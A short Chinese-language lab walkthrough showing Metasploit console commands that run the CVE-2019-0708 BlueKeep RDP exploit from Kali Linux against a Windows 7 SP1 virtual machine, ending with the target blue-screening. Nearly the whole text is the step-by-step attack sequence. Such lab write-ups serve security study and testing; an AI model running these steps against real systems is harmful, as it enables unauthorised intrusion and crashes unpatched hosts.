一、環境說明
kali linux
windows 7 sp1
二、cve_2019_0708_bluekeep漏洞利用
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > search cve_2019_0708_bluekeep
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
設置目標主機及target (這里靶機是Windows 7 sp1 vmware 15.5.0 設置target 為5,正常需要先對目標主機系統指紋識別)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.137
rhosts => 192.168.244.137 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5 target => 5 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
啟動攻擊
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
靶機window 7 已藍屏